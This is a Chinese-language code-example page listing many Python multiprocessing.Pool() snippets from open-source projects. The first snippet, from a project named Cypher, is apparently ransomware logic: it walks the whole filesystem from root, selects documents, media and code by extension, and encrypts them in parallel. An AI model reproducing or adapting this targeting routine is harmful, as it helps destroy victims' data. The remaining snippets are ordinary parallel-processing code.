Python multiprocessing 模块，Pool() 实例源码

我们从Python开源项目中，提取了以下50个代码示例，用于说明如何使用multiprocessing.Pool()。

项目：Cypher 作者：NullArray | 项目源码 | 文件源码

def select_files():

    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv", 
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
       ".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
       ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]

    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.append(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)

项目：NordVPN-NetworkManager 作者：Chadsr | 项目源码 | 文件源码

def get_best_servers(server_list, ping_attempts, valid_protocols):
    manager = multiprocessing.Manager()
    best_servers = manager.dict()

    num_servers = len(server_list)
    num_processes = get_num_processes(num_servers)

    pool = multiprocessing.Pool(num_processes, maxtasksperchild=1)
    pool.map(partial(compare_server, best_servers=best_servers, ping_attempts=ping_attempts, valid_protocols=valid_protocols), server_list)
    pool.close()

    return best_servers

项目：data_pipeline 作者：Yelp | 项目源码 | 文件源码

def close(self):
        try:
            logger.debug("Starting to close pooled producer")
            super(PooledKafkaProducer, self).close()
            assert self.message_buffer_size == 0
            logger.debug("Closing the pool")
            self.pool.close()
            logger.debug("Pool is closed.")
        except:
            logger.error("Exception occurred when closing pooled producer.")
            raise
        finally:
            # The processes in the pool should be cleaned up in all cases. The
            # exception will be re-thrown if there is one.
            #
            # Joining pools can be flaky in CPython 2.6, and the message buffer
            # size is zero here, so terminating the pool is safe and ensure that
            # join always works.
            self.pool.terminate()
            self.pool.join()

项目：ComicSpider 作者：QuantumLiu | 项目源码 | 文件源码

def download_chapter_m(self):
        '''
        ???????????
        Download all pages of the chapter using multiprocessing
        '''
        results=[]
        if not self.pages:
            print('No page')
            return None
        mp=Pool(min(8,max(cpu_count(),4)))
        for page in self.pages:
            results.append(mp.apply_async(self.download_page,(page,)))
        mp.close()
        mp.join()
        num=sum([result.get() for result in results])
        print('Downloaded {} pages'.format(num))

项目：PyWebRunner 作者：IntuitiveWebSolutions | 项目源码 | 文件源码

def main():
    global ARGS

    parser = argparse.ArgumentParser(description='Run a PyWebRunner YAML/JSON script.')
    parser.add_argument('-b', '--browser', help='Which browser to load. Defaults to Chrome.')
    parser.add_argument('--base-url', help='Base URL to use with goto command.')
    parser.add_argument('-t', '--timeout', help='Global wait timeout (in seconds). Defaults to 30.')
    parser.add_argument('-p', '--processes', help='Number of processes (browsers) to use. Defaults to 1')
    parser.add_argument('-do', '--default-offset', help='New default offset for scroll_to_element. (Default is 0)')
    parser.add_argument('--errors', dest='errors', action='store_true', help='Show errors.')
    parser.add_argument('--focus', dest='focus', action='store_true', help='Focus the browser on launch.')
    parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Verbose output of commands being executed.')
    parser.add_argument('files', nargs='*')
    ARGS = parser.parse_args()

    processes = ARGS.processes or 1
    pool = Pool(int(processes))

    pool.map(run_test, ARGS.files)

    pool.close()
    pool.join()

项目：ProtScan 作者：gianlucacorrado | 项目源码 | 文件源码

def multiprocess_find_blocks(profiles, window, n_blocks=None,
                             block_size=None, n_jobs=-1):
    """Find blocks in profiles (parallel version)."""
    intervals = compute_intervals(
        size=len(profiles), n_blocks=n_blocks, block_size=block_size)
    if n_jobs == -1:
        pool = mp.Pool()
    else:
        pool = mp.Pool(n_jobs)
    results = [apply_async(pool, serial_find_blocks,
                           args=(dict(profiles.items()[start:end]),
                                 window))
               for start, end in intervals]
    dicts = [p.get() for p in results]
    pool.close()
    pool.join()
    blocks = {k: v for d in dicts for k, v in d.items()}
    return blocks

项目：astrobase 作者：waqasbhatti | 项目源码 | 文件源码

def townsend_lombscargle_wrapper(task):
    '''
    This wraps the function above for use with mp.Pool.

    task[0] = times
    task[1] = mags
    task[2] = omega

    '''

    try:
        return townsend_lombscargle_value(*task)

    # if the LSP calculation fails for this omega, return a npnan
    except Exception as e:
        return npnan

项目：Harmonbot 作者：Harmon758 | 项目源码 | 文件源码

def calculate(self, *, equation : str):
        '''Calculator'''
        #_equation = re.sub("[^[0-9]+-/*^%\.]", "", equation).replace('^', "**") #words
        replacements = {"pi" : "math.pi", 'e' : "math.e", "sin" : "math.sin", "cos" : "math.cos", "tan" : "math.tan", '^' : "**"}
        allowed = set("0123456789.+-*/^%()")
        for key, value in replacements.items():
            equation = equation.replace(key, value)
        equation = "".join(character for character in equation if character in allowed)
        print("Calculated " + equation)
        with multiprocessing.Pool(1) as pool:
            async_result = pool.apply_async(eval, (equation,))
            future = self.bot.loop.run_in_executor(None, async_result.get, 10.0)
            try:
                result = await asyncio.wait_for(future, 10.0, loop = self.bot.loop)
                await self.bot.embed_reply("{} = {}".format(equation, result))
            except discord.errors.HTTPException:
                await self.bot.embed_reply(":no_entry: Output too long")
            except SyntaxError:
                await self.bot.embed_reply(":no_entry: Syntax error")
            except ZeroDivisionError:
                await self.bot.embed_reply(":no_entry: Error: Division by zero")
            except (concurrent.futures.TimeoutError, multiprocessing.context.TimeoutError):
                await self.bot.embed_reply(":no_entry: Execution exceeded time limit")

项目：AutoSleepScorerDev 作者：skjerns | 项目源码 | 文件源码

def get_all_features_m(data):
    """
    returns a vector with extraced features
    :param data: datapoints x samples x dimensions (dimensions: EEG,EMG, EOG)
    """
    p = Pool(3)
    t1 = p.apply_async(feat_eeg,(data[:,:,0],))
    t2 = p.apply_async(feat_eog,(data[:,:,1],))
    t3 = p.apply_async(feat_emg,(data[:,:,2],))
    eeg = t1.get(timeout = 1200)
    eog = t2.get(timeout = 1200)
    emg = t3.get(timeout = 1200)
    p.close()
    p.join()

    return np.hstack([eeg,emg,eog])

项目：backend.ai-client-py 作者：lablup | 项目源码 | 文件源码

def create_kernels(concurrency, parallel=False):
    kernel_ids = []
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(concurrency)
        results = pool.map(run_create_kernel, range(concurrency))
        for t, kid in results:
            times_taken.append(t)
            kernel_ids.append(kid)
    else:
        for _idx in range(concurrency):
            t, kid = run_create_kernel(_idx)
            times_taken.append(t)
            kernel_ids.append(kid)

    print_stat('create_kernel', times_taken)
    return kernel_ids

项目：backend.ai-client-py 作者：lablup | 项目源码 | 文件源码

def execute_codes(kernel_ids, parallel=False):
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(len(kernel_ids))
        results = pool.map(run_execute_code, kernel_ids)
        for t in results:
            if t is not None:
                times_taken.append(t)
    else:
        for kid in kernel_ids:
            t = run_execute_code(kid)
            if t is not None:
                times_taken.append(t)

    print_stat('execute_code', times_taken)

项目：backend.ai-client-py 作者：lablup | 项目源码 | 文件源码

def restart_kernels(kernel_ids, parallel=False):
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(len(kernel_ids))
        results = pool.map(run_restart_kernel, kernel_ids)
        for t in results:
            if t is not None:
                times_taken.append(t)
    else:
        for kid in kernel_ids:
            t = run_restart_kernel(kid)
            if t is not None:
                times_taken.append(t)

    print_stat('restart_kernel', times_taken)

项目：backend.ai-client-py 作者：lablup | 项目源码 | 文件源码

def destroy_kernels(kernel_ids, parallel=False):
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(len(kernel_ids))
        results = pool.map(run_destroy_kernel, kernel_ids)
        for t in results:
            if t is not None:
                times_taken.append(t)
    else:
        for kid in kernel_ids:
            t = run_destroy_kernel(kid)
            if t is not None:
                times_taken.append(t)

    print_stat('destroy_kernel', times_taken)

项目：mongodb_consistent_backup 作者：Percona-Lab | 项目源码 | 文件源码

def __init__(self, manager, config, timer, base_dir, backup_dir, tailed_oplogs, backup_oplogs):
        super(Resolver, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir)
        self.tailed_oplogs = tailed_oplogs
        self.backup_oplogs = backup_oplogs

        self.compression_supported = ['none', 'gzip']
        self.resolver_summary      = {}
        self.resolver_state        = {}

        self.running   = False
        self.stopped   = False
        self.completed = False
        self._pool     = None
        self._pooled   = []
        self._results  = {}
        try:
            self._pool = Pool(processes=self.threads(None, 2))
        except Exception, e:
            logging.fatal("Could not start oplog resolver pool! Error: %s" % e)
            raise Error(e)

项目：mongodb_consistent_backup 作者：Percona-Lab | 项目源码 | 文件源码

def __init__(self, manager, config, timer, base_dir, backup_dir, **kwargs):
        super(Rsync, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir, **kwargs)
        self.backup_location = self.config.backup.location
        self.backup_name     = self.config.backup.name
        self.remove_uploaded = self.config.upload.remove_uploaded
        self.retries         = self.config.upload.retries
        self.thread_count    = self.config.upload.threads
        self.rsync_path      = self.config.upload.rsync.path
        self.rsync_user      = self.config.upload.rsync.user
        self.rsync_host      = self.config.upload.rsync.host
        self.rsync_port      = self.config.upload.rsync.port
        self.rsync_ssh_key   = self.config.upload.rsync.ssh_key
        self.rsync_binary    = "rsync"

        self.rsync_flags   = ["--archive", "--compress"]
        self.rsync_version = None
        self._rsync_info   = None

        self._pool = Pool(processes=self.threads())

项目：OptML 作者：johannespetrat | 项目源码 | 文件源码

def fit(self, X_train, y_train, X_test=None, y_test=None):
        """
        """
        if (X_test is None) and (y_test is None):
            X_test = X_train
            y_test = y_train
        elif (X_test is None) or (y_test is None):
            raise MissingValueException("Need to provide 'X_test' and 'y_test'")

        fun = partial(objective, deepcopy(self.model), 
                                 deepcopy(self.model_module), 
                                 deepcopy(self.eval_func),
                                 X_train, y_train, X_test, y_test)
        pool = Pool(self.n_jobs)
        scores = pool.map(fun, deepcopy(self.grid))
        self.hyperparam_history = scores

        best_params, best_model = self.get_best_params_and_model()
        return best_params, best_model

项目：untwist 作者：IoSR-Surrey | 项目源码 | 文件源码

def __call__(self, process_func):

        def wrapper(*args):
            data_obj = args[1]
            if (len(data_obj.shape) <= self.input_dim
                or data_obj.shape[-1] == 1):
                return process_func(*args)
            else:
                pool = mp.Pool(mp.cpu_count())# TODO: make configurable
                arglist = [
                    (args[0],) +
                    (data_obj[...,i],) +
                    args[2:]
                    for i in range(data_obj.shape[-1])
                ]
                result = pool.map(self.worker, arglist)
                if self.output_dim > self.input_dim: # expanding
                    return np.stack(result, -1)
                else: # contracting
                    return np.concatenate(result, -1)
        return wrapper

项目：povsim 作者：mechaphish | 项目源码 | 文件源码

def _multitest_binary_pov(self, pov_path, cb_path, enable_randomness, debug, bitflip, timeout, times):

            pool = Pool(processes=4)

            res = [pool.apply_async(self._test_binary_pov,
                                    (pov_path, cb_path, enable_randomness, debug, bitflip, timeout))
                                    for _ in range(times)]

            results = [ ]
            for r in res:
                try:
                    results.append(r.get(timeout=timeout + 5))
                except TimeoutError:
                    results.append(False)

            return results

项目：Software-Architecture-with-Python 作者：PacktPublishing | 项目源码 | 文件源码

def batch_files(pool_size, limit):
    """ Create batches of files to process by a multiprocessing Pool """

    batch_size = limit // pool_size

    filenames = []

    for i in range(pool_size):
        batch = []
        for j in range(i*batch_size, (i+1)*batch_size):
            filename = 'numbers/numbers_%d.txt' % j
            batch.append(filename)

        filenames.append(batch)

    return filenames

项目：pymotw3 作者：reingart | 项目源码 | 文件源码

def __init__(self, map_func, reduce_func, num_workers=None):
        """
        map_func

          Function to map inputs to intermediate data. Takes as
          argument one input value and returns a tuple with the
          key and a value to be reduced.

        reduce_func

          Function to reduce partitioned version of intermediate
          data to final output. Takes as argument a key as
          produced by map_func and a sequence of the values
          associated with that key.

        num_workers

          The number of workers to create in the pool. Defaults
          to the number of CPUs available on the current host.
        """
        self.map_func = map_func
        self.reduce_func = reduce_func
        self.pool = multiprocessing.Pool(num_workers)

项目：glassdoor-analysis 作者：THEdavehogue | 项目源码 | 文件源码

def multi_scrub_text(reviews):
    '''
    Function to lemmatize text - utilizes multiprocessing for parallelization

    INPUT:
        reviews: array-like, pandas DataFrame column containing review texts

    OUTPUT:
        lemmatized: pandas DataFrame column with cleaned texts
    '''
    lemmatized = []
    cpus = cpu_count() - 1
    pool = Pool(processes=cpus)
    lemmatized = pool.map(lemmatize_text, reviews)
    pool.close()
    pool.join()
    return lemmatized

项目：glassdoor-analysis 作者：THEdavehogue | 项目源码 | 文件源码

def multi_core_scrape(num_pages, db_coll):
    '''
    Map the API scrape across number of processors - 1 for performance boost.

    INPUT:
        num_pages: int, number of pages to scrape
        db_coll: pymongo collection object, collection to add documents to

    OUTPUT:
        None, records inserted into MongoDB
    '''
    cpus = cpu_count() - 1
    pool = Pool(processes=cpus)
    pages = range(1, num_pages + 1)
    employers = pool.map(scrape_api_page, pages)
    pool.close()
    pool.join()
    print 'Inserting Employer Records into MongoDB . . .'
    pbar = ProgressBar()
    for page in pbar(employers):
        db_coll.insert_many(page)

项目：tianchi_power 作者：lvniqi | 项目源码 | 文件源码

def predict_tf_all(path = None):
    result_list = []
    p = m_Pool(31)
    result_list = p.map(predict_tf_once,range(1,32))
    p.close()
    p.join()
    print 'writing...'
    result_df = pd.DataFrame(index = range(1))
    for day,result in result_list:
        day_s = str(day)
        if len(day_s)<=1:
            day_s = '0'+day_s
        result_df['201610'+day_s] = result
    result_df = result_df.T
    result_df.columns = ['predict_power_consumption']
    if path == None:
        date = str(pd.Timestamp(time.ctime())).replace(' ','_').replace(':','_')
        path = './result/'+date+'.csv'
    result_df.to_csv(path,index_label='predict_date')

    l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32))
    t = pd.concat(l)
    t.to_csv('./result/predict_part/'+date+'.csv')

项目：tianchi_power 作者：lvniqi | 项目源码 | 文件源码

def make_month_features_all():
    pw_df_list = []
    dataset = get_dataset()
    dataset.power_consumption = dataset.power_consumption.apply(np.log)
    for user_id in get_user_id_list():
        print user_id
        if not check_empty(user_id):
            user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(0)
            #add to list
            pw_df_list.append((user_id,user_df))
            #make_features(user_id,user_df)

    p = m_Pool(64)
    for arg in pw_df_list:
        #p.apply_async(make_features,args=(arg))
        p.apply_async(make_month_features,args=(arg))

    print 'Waiting for all subprocesses done...'
    p.close()
    p.join()

项目：tianchi_power 作者：lvniqi | 项目源码 | 文件源码

def make_history_month_features_all():
    pw_df_list = []
    dataset = get_dataset()
    dataset.power_consumption = dataset.power_consumption
    for user_id in get_user_id_list():
        print user_id
        if not check_empty(user_id):
            user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(1)
            #add to list
            pw_df_list.append((user_id,user_df))
            #make_features(user_id,user_df)

    p = m_Pool(64)
    for arg in pw_df_list:
        p.apply_async(make_history_month_features,args=(arg))

    print 'Waiting for all subprocesses done...'
    p.close()
    p.join()

项目：PyFunt 作者：dnlcrl | 项目源码 | 文件源码

def _reset(self):
        '''
        Set up some book-keeping variables for optimization. Don't call this
        manually.
        '''
        # Set up some variables for book-keeping
        self.epoch = 0
        self.best_val_acc = 0
        self.best_params = {}
        self.loss_history = []
        self.val_acc_history = []
        self.train_acc_history = []
        self.pbar = None

        # Make a deep copy of the optim_config for each parameter
        self.optim_configs = {}
        self.params, self.grad_params = self.model.get_parameters()
        # self.weights, _ = self.model.get_parameters()
        for p in range(len(self.params)):
            d = {k: v for k, v in self.optim_config.iteritems()}
            self.optim_configs[p] = d

        self.multiprocessing = bool(self.num_processes-1)
        if self.multiprocessing:
            self.pool = mp.Pool(self.num_processes, init_worker)

项目：Generative-ConvACs 作者：HUJI-Deep | 项目源码 | 文件源码

def classify(self,X,Y, use_normalized=True, mask=None):
        if self._use_whitened_similarity:
            self.precompute_marginals()
            self._pool = Pool(initializer=init_worker, initargs=(self._num_instances,
                self._conv_param.kernel_h, self._conv_param.kernel_w, self._conv_param.pad[0],
                self._conv_param.stride[0], self._im2col_indices, self._pdfs))
        probs, preds = self.collect_probs(X, Y, use_normalized, mask=mask)
        self._prob_mat = probs
        self._Y_hat = preds
        self._Y = Y
        self._tested = True
        if self._use_whitened_similarity:
            self._pool.close()
            self._pool.join()
            self._pool = None
            self._pdfs = None

项目：xenoGI 作者：ecbush | 项目源码 | 文件源码

def runBlast(fastaFilePath,blastFilePath,blastCLine,numThreads):
    '''Run blast comparing every database against every other in
fastaFilePath. Save to the directory indicated by blastFilePath, using
the blast parameters in blastCLine.'''

    # format the databases
    dbFileL=glob.glob(fastaFilePath)
    formatDb(dbFileL)

    # create blast directory


    # if directory for blast doesn't exist yet, make it
    blastDir = blastFilePath.split("*")[0]
    if glob.glob(blastDir)==[]:
        os.mkdir(blastDir)

    clineL =  makeBlastClineList(dbFileL,fastaFilePath,blastFilePath,blastCLine)

    p=Pool(numThreads)
    stderrL = p.map(subprocessWrapper, clineL)

    return

项目：TC-Lung_nodules_detection 作者：Shicoder | 项目源码 | 文件源码

def process_images(delete_existing=False, only_process_patient=None):
    if delete_existing and os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
        print("Removing old stuff..")
        if os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
            shutil.rmtree(settings.VALIDATION_EXTRACTED_IMAGE_DIR)

    if not os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
        os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR)
        # os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR + "_labels/")

    for subject_no in range(settings.VAL_SUBSET_START_INDEX, settings.VAL_SUBSET_TRAIN_NUM):
        src_dir = settings.RAW_SRC_DIR + "val_subset0" + str(subject_no) + "/"
        src_paths = glob.glob(src_dir + "*.mhd")

        if only_process_patient is None and True:
            pool = multiprocessing.Pool(8)
            pool.map(process_image, src_paths)
        else:
            for src_path in src_paths:
                print(src_path)
                if only_process_patient is not None:
                    if only_process_patient not in src_path:
                        continue
                process_image(src_path)

项目：TC-Lung_nodules_detection 作者：Shicoder | 项目源码 | 文件源码

def process_images(delete_existing=False, only_process_patient=None):
    if delete_existing and os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
        print("Removing old stuff..")
        if os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
            shutil.rmtree(settings.TRAIN_EXTRACTED_IMAGE_DIR)

    if not os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
        os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR)
        os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR + "_labels/")

    for subject_no in range(settings.TRAIN_SUBSET_START_INDEX, settings.TRAIN_SUBSET_TRAIN_NUM):
        src_dir = settings.RAW_SRC_DIR + "train_subset0" + str(subject_no) + "/"
        src_paths = glob.glob(src_dir + "*.mhd")

        if only_process_patient is None and True:
            pool = multiprocessing.Pool(6)
            pool.map(process_image, src_paths)
        else:
            for src_path in src_paths:
                print(src_path)
                if only_process_patient is not None:
                    if only_process_patient not in src_path:
                        continue
                process_image(src_path)

项目：cortex 作者：rdevon | 项目源码 | 文件源码

def save_images(nifti_files, anat, roi_dict, out_dir, **kwargs):
    '''Saves multiple nifti images using multiprocessing.

    Uses `multiprocessing`.

    Args:
        nifti_files (list): list of nifti file paths.
        anat (nipy.core.api.image.image.Image): anatomical image.
        roi_dict (dict): dictionary of cluster dictionaries.
        out_dir (str): output directory path.
        **kwargs: extra keyword arguments.

    '''
    p = mp.Pool(30)
    idx = [int(f.split('/')[-1].split('.')[0]) for f in nifti_files]
    args_iter = itertools.izip(nifti_files,
                               itertools.repeat(anat),
                               [roi_dict[i] for i in idx],
                               [path.join(out_dir, '%d.png' % i) for i in idx],
                               idx)

    p.map(save_helper, args_iter)
    p.close()
    p.join()

项目：census-loader 作者：minus34 | 项目源码 | 文件源码

def multiprocess_csv_import(work_list, settings, logger):
    pool = multiprocessing.Pool(processes=settings['max_concurrent_processes'])

    num_jobs = len(work_list)

    results = pool.imap_unordered(run_csv_import_multiprocessing, [[w, settings] for w in work_list])

    pool.close()
    pool.join()

    result_list = list(results)
    num_results = len(result_list)

    if num_jobs > num_results:
        logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts")

    for result in result_list:
        if result != "SUCCESS":
            logger.info(result)

项目：census-loader 作者：minus34 | 项目源码 | 文件源码

def multiprocess_list(mp_type, work_list, settings, logger):
    pool = multiprocessing.Pool(processes=settings['max_concurrent_processes'])

    num_jobs = len(work_list)

    if mp_type == "sql":
        results = pool.imap_unordered(run_sql_multiprocessing, [[w, settings] for w in work_list])
    else:
        results = pool.imap_unordered(run_command_line, work_list)

    pool.close()
    pool.join()

    result_list = list(results)
    num_results = len(result_list)

    if num_jobs > num_results:
        logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts")

    for result in result_list:
        if result != "SUCCESS":
            logger.info(result)

项目：census-loader 作者：minus34 | 项目源码 | 文件源码

def multiprocess_shapefile_load(work_list, settings, logger):
    pool = multiprocessing.Pool(processes=settings['max_concurrent_processes'])

    num_jobs = len(work_list)

    results = pool.imap_unordered(intermediate_shapefile_load_step, [[w, settings] for w in work_list])

    pool.close()
    pool.join()

    result_list = list(results)
    num_results = len(result_list)

    if num_jobs > num_results:
        logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts")

    for result in result_list:
        if result != "SUCCESS":
            logger.info(result)

项目：indexed_gzip 作者：pauldmccarthy | 项目源码 | 文件源码

def check_data_valid(data, startval, endval=None):
    if endval is None:
        endval = len(data)

    chunksize = 10000000

    startval = int(startval)
    endval   = int(endval)

    offsets = np.arange(0, len(data), chunksize)
    args = []
    result = True
    for offset in offsets:
        s      = startval + offset
        e      = min(s + chunksize, endval)
        nelems = e - s
        test_chunk = data[offset:offset + nelems]
        args.append((s, e, test_chunk))

    pool = mp.Pool()
    result = all(pool.map(_check_chunk, args))
    pool.terminate()

    return result

项目：dlcli 作者：outlyerapp | 项目源码 | 文件源码

def metrics(period, resolution, tag, threads, metricsfile):
    try:
        pool = Pool(processes=threads)
        period_seconds = period * 3600
        resolution_seconds = resolution * 3600

        if metricsfile:
            with open(metricsfile) as fp:
                m = json.loads(fp.read().replace('][', ','))
        else:
            m = metrics_api.get_tag_metrics(tag_name=tag, **context.settings)

        click.echo(click.style('Found: %s metrics', fg='green') % (len(m)))

        expire = partial(_expire_metric_path, period_seconds, resolution_seconds, tag)
        expired_paths = tqdm(pool.imap_unordered(expire, m))
        expired_paths = sum(filter(None, expired_paths))
        click.echo(click.style('Expired: %s metric paths', fg='green') % expired_paths)

    except Exception, e:
        print 'Cleanup metrics failed. %s' % e

    finally:
        pool.terminate()
        pool.join()

项目：proxmox-tools 作者：FredHutch | 项目源码 | 文件源码

def easy_par(f, sequence):    
    from multiprocessing import Pool
    poolsize=len(sequence)
    if poolsize > 16:
        poolsize = 16
    pool = Pool(processes=poolsize)
    try:
        # f is given sequence. guaranteed to be in order
        cleaned=False
        result = pool.map(f, sequence)
        cleaned = [x for x in result if not x is None]
        #cleaned = asarray(cleaned)
        # not optimal but safe
    except KeyboardInterrupt:
        pool.terminate()
    except Exception as e:
        print('got exception: %r' % (e,))
        if not args.force:
            print("Terminating the pool")
            pool.terminate()
    finally:
        pool.close()
        pool.join()
        return cleaned

项目：siggi 作者：rieck | 项目源码 | 文件源码

def load_bundle(filename, regex="^\d+", chunk=None):
    """ Load graphs from zip archive """

    pool = Pool()
    archive = zf.ZipFile(filename)

    # Determine entries and select subset if requested
    entries = archive.namelist()
    if chunk:
        entries = list(set(entries) & set(chunk))
    entries = [(archive, entry) for entry in entries]

    # Load entries in parallel
    func = partial(load_bundle_entry, regex=re.compile(regex))
    items = pool.map(func, entries)
    items = filter(lambda (g, l): g is not None, items)
    graphs, labels = zip(*items)

    archive.close()
    pool.close()
    pool.join()

    return graphs, labels

项目：facebook_group_crawler 作者：spartakos87 | 项目源码 | 文件源码

def fun_page(page_id,onoma):
    pp= Pool(50)
    mega_list = []
    start = time.time()
    pst = p(page_id,access_token)
    n = 50 
    group_post = group(pst,n)
    temp = 0 
    for j in group_post:
        temp += len(j)
        print(str(temp)+'/'+str(len(pst)))
        re = pp.map(pros,list(j))
        for jj in re:
            mega_list.append(jj)
    duration = (time.time()-start)/float(60)
    print ("Time:"+str(duration)+'min')
    with open(onoma,'w') as f:
        json.dump(mega_list,f)
    return mega_list

项目：paragraph2vec 作者：thunlp | 项目源码 | 文件源码

def query_shards(self, query):
        """
        Return the result of applying shard[query] for each shard in self.shards,
        as a sequence.

        If PARALLEL_SHARDS is set, the shards are queried in parallel, using
        the multiprocessing module.
        """
        args = zip([query] * len(self.shards), self.shards)
        if PARALLEL_SHARDS and PARALLEL_SHARDS > 1:
            logger.debug("spawning %i query processes" % PARALLEL_SHARDS)
            pool = multiprocessing.Pool(PARALLEL_SHARDS)
            result = pool.imap(query_shard, args, chunksize=1 + len(args) / PARALLEL_SHARDS)
        else:
            # serial processing, one shard after another
            pool = None
            result = imap(query_shard, args)
        return pool, result

项目：base_function 作者：Rockyzsu | 项目源码 | 文件源码

def process_pool():
    p=Pool(10)
    start=time.time()
    #q1=Queue.Queue()
    manager=Manager()
    q=manager.Queue()
    print "main start ",start
    for i in xrange(10):
        p.apply_async(sub_pool,args=(q,))
    p.close()
    p.join()
    end=time.time()

    print "process done at ",end
    #print q
    print q.get()
    '''
    while q1.empty() ==False:
        d= q1.get(True)
        print d
    '''

项目：base_function 作者：Rockyzsu | 项目源码 | 文件源码

def pool_map():
    x=[i for i in range (50) if i%2==0]
    #print x

    start=time.time()
    '''
    for i in x:
        single(i)
    print "time used " , time.time()-start
    '''
    #using multiprocess
    p=Pool(2)
    s=p.map(single,x)
    p.close()
    p.join()
    print s
    print len(s)
    print "end. Time used: ",time.time()-start

项目：tts-stray 作者：tweetyf | 项目源码 | 文件源码

def transTest():
     #??????????CPU????
    numprocs = 8 #?4????4???????4?
    pool = multiprocessing.Pool(processes=numprocs)
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("BBCHeadline.txt","BBCHeadline.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("1984.txt","1984.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("emma.txt","emma.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("Home.2009.eng.txt","Home.2009.eng.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("StrayBirds.txt","StrayBirds.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("????.txt","????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("???????.txt","???????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("????????.txt","????????.wav","zh"))
    pool.apply_async(func =tts_baidu.fileToVoice , args=("????.txt","????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("????????.txt","????????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("???????.txt","???????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("??????.txt","??????.wav","zh"))
    pool.close()
    pool.join()

项目：tts-stray 作者：tweetyf | 项目源码 | 文件源码

def trans_novs():
    # 249 novals gaga
    #??????????CPU????
    count =0 
    numprocs = 8 #?4????4???????4?
    pool = multiprocessing.Pool(processes=numprocs)
    files = os.listdir("./nov")
    for filename in files:
        if not os.path.isdir(filename):
            if filename.endswith("txt"):
                fname = "./nov/"+filename
                #print fname
                pool.apply_async(func =tts_baidu.fileToVoice , args=(fname,fname+".wav","zh"))
    pool.close()
    pool.join()
    #print "finish all ,total handle TTS GET() :",count

项目：GAEDataExport 作者：nikhilsaraf | 项目源码 | 文件源码

def main():
    input_dir, output_dir = getDirs()
    table_list = listFiles(input_dir)

    concurrency = cpu_count()
    print 'Using {0:d} Processes'.format(concurrency)
    pool = Pool(concurrency)

    # perform the passed in write action (function) for each csv row
    time_capture = TimeCapture(time.time())
    results = pool.map(
        multiprocess,
        izip(repeat(output_dir),
            [copy.deepcopy(time_capture) for i in range(len(table_list))],
            table_list,
            repeat(write)))
    time_capture.end(1)

    pool.close()
    pool.join()

    print 'Finished Successfully!'
    displayResults(results, time_capture.total_time)

项目：HSISeg 作者：HSISeg | 项目源码 | 文件源码

def get_dissimilarity_matrix(U,V,X,n,error_list,beta,alpha_w,alpha_e_avg_t,alpha_n0,maxconn):
    row_size = X.shape[0]
    col_size = X.shape[1]
    channel_count = X.shape[2]
    alpha = get_alpha(n,error_list,alpha_w,alpha_e_avg_t,alpha_n0)
    cluster_number = V.shape[0]
    D = np.zeros((row_size,col_size,cluster_number)) 
    index_arr = np.array([[k,l] for k in xrange(row_size) for l in xrange(col_size)],dtype='int32')
    U_new = U.reshape(row_size*col_size,cluster_number, order='F')
    data_inputs = [0 for i in xrange(0,row_size*col_size)]
    for i in xrange(0, row_size*col_size):
        x = index_arr[i][0]
        y = index_arr[i][1]
        data_inputs[i] = [U_new,V,X[x][y],x,y,alpha,beta[x*row_size+y,:]]
    pool = Pool(maxconn) 
    outputs = pool.map(compute_cluster_distances_pool, data_inputs)
    pool.close()
    pool.join()
    for i in xrange(0,row_size*col_size):
        x = index_arr[i][0]
        y = index_arr[i][1]
        D[x][y] = outputs[i]
    return D

项目：kaggle-seizure-prediction 作者：sics-lm | 项目源码 | 文件源码

def load_files_parallel(feature_files, load_function, processes, **kwargs):
    """
    Function for loading feature files in parallel.
    :param feature_files: The collection of files to load.
    :param load_function: The function used to load the objects.
